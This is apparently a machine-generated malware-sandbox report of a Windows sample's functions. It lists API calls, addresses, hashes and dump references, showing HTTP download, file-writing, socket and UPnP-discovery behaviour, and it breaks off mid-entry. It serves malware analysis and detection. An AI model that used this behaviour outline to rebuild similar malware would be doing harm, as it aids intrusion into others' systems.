                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                              • String ID: PCOI$ilci$.#v
                                                                                                                                                                                              • API String ID: 2403999931-387814812
                                                                                                                                                                                              • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                              • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                              • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 004058D8
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00405926
                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                              • String ID: %x%X$0
                                                                                                                                                                                              • API String ID: 716646876-225668902
                                                                                                                                                                                              • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                              • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040E668
                                                                                                                                                                                              • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                              • String ID: <$GET
                                                                                                                                                                                              • API String ID: 1205665004-427699995
                                                                                                                                                                                              • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                              • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                              • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                                                                              • memcmp.NTDLL ref: 0040F35D
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3902698870-507759092
                                                                                                                                                                                              • Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                              • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3862671961-0
                                                                                                                                                                                              • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                              • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                                                                              • CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                                                                                • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 439099756-507759092
                                                                                                                                                                                              • Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                              • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                                                                              • CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3956458805-507759092
                                                                                                                                                                                              • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                              • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                                                                              • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                                                                              • CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 1457358591-507759092
                                                                                                                                                                                              • Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                                                                              • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                                                                              • Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                                                                              • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                              • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 671207744-0
                                                                                                                                                                                              • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                              • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleeprecvfrom
                                                                                                                                                                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                              • API String ID: 668330359-3973262388
                                                                                                                                                                                              • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                              • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                                                                              • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                              • API String ID: 2743515581-2960703779
                                                                                                                                                                                              • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                              • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                                                                              • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: device$deviceType
                                                                                                                                                                                              • API String ID: 1602765415-3511266565
                                                                                                                                                                                              • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                              • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                                                                              • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: service$serviceType
                                                                                                                                                                                              • API String ID: 1602765415-3667235276
                                                                                                                                                                                              • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                              • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
